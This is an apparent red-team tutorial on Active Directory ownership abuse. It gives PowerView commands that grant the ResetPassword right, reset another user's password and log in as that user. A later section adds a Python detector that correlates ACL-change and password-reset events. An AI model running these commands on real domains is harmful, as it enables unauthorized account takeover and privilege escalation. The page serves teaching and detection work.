Ownership
Ownership: If you own a user object, you can grant yourself a right on it, i.e. ResetPassword, that allows you to reset the user's password, thereby escalating your privileges.
Enumeration
BloodHound
Ownership Enumeration
The image below shows that the current user usman is the owner of user ali.
Exploitation
PowerView
Give Resetpassword Right
Execute the command below to give yourself the ResetPassword right.
Command
add-domainobjectacl -TargetIdentity [target_user] -PrincipalIdentity [Your Current User] -Rights Resetpassword
You can verify it using the below command.
Command
get-objectacl -resolveguids | ? {$_.securityidentifier -eq "[your_current_user_sid]"}
Reset Password
With the ResetPassword right granted, you can reset the user's password and log in to the account by executing the commands below.
Command
$pass = ConvertTo-SecureString '[Your New Password Here]' -AsPlainText -Force
set-domainuserpassword -identity [target_user] -accountpassword $pass
runas /user:[domain\user] cmd.exe
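Detection
For defenders, the grant-then-reset sequence above leaves a recognisable trail in the domain controller Security log. The following added example (not part of the original page) correlates event 5136 (directory object modified, attribute nTSecurityDescriptor) with event 4724 (password reset attempt) by the same account on the same user. The event dictionaries, the CORP domain, the extra account names and the normalised field names are constructed assumptions, and 5136 is only logged when directory service change auditing and a SACL on the object are in place.

```python
from datetime import datetime, timedelta

# Constructed sample events (not real logs). Fields are assumed to be normalised
# by the log pipeline: 5136 = directory object modified, 4724 = password reset attempt.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T08:00:00", "id": 5136, "subject": "CORP\\bilal",
     "target": "zara", "attribute": "nTSecurityDescriptor"},
    {"time": "2024-05-01T09:00:00", "id": 5136, "subject": "CORP\\svc_idm",
     "target": "omar", "attribute": "description"},
    {"time": "2024-05-01T09:02:00", "id": 4724, "subject": "CORP\\svc_idm", "target": "omar"},
    {"time": "2024-05-01T10:00:05", "id": 5136, "subject": "CORP\\usman",
     "target": "ali", "attribute": "nTSecurityDescriptor"},
    {"time": "2024-05-01T10:01:40", "id": 4724, "subject": "CORP\\usman", "target": "ali"},
    {"time": "2024-05-01T11:00:00", "id": 4724, "subject": "CORP\\helpdesk", "target": "sara"},
    {"time": "2024-05-01T12:00:00", "id": 4724, "subject": "CORP\\bilal", "target": "zara"},
]

def find_acl_then_reset(events, window=timedelta(minutes=30), allowed_subjects=()):
    """Return (subject, target, acl_time, reset_time) for every password reset that
    follows a security-descriptor change by the same subject on the same user."""
    allowed = {s.lower() for s in allowed_subjects}  # e.g. a provisioning service
    acl_changes = {}  # (subject, target) -> time of the latest descriptor change
    hits = []
    for ev in sorted(events, key=lambda e: e["time"]):
        subject = ev["subject"].lower()
        if subject in allowed:
            continue
        key = (subject, ev["target"].lower())
        when = datetime.fromisoformat(ev["time"])
        if ev["id"] == 5136 and ev.get("attribute", "").lower() == "ntsecuritydescriptor":
            acl_changes[key] = when
        elif ev["id"] == 4724 and key in acl_changes and when - acl_changes[key] <= window:
            hits.append((ev["subject"], ev["target"], acl_changes[key], when))
    return hits

if __name__ == "__main__":
    for subject, target, acl_time, reset_time in find_acl_then_reset(SAMPLE_EVENTS):
        print(f"{subject} changed the ACL of {target} at {acl_time} "
              f"and reset its password at {reset_time}")
```

Accounts that legitimately edit ACLs and reset passwords, such as an identity management service, can be passed in allowed_subjects to keep the alert volume low.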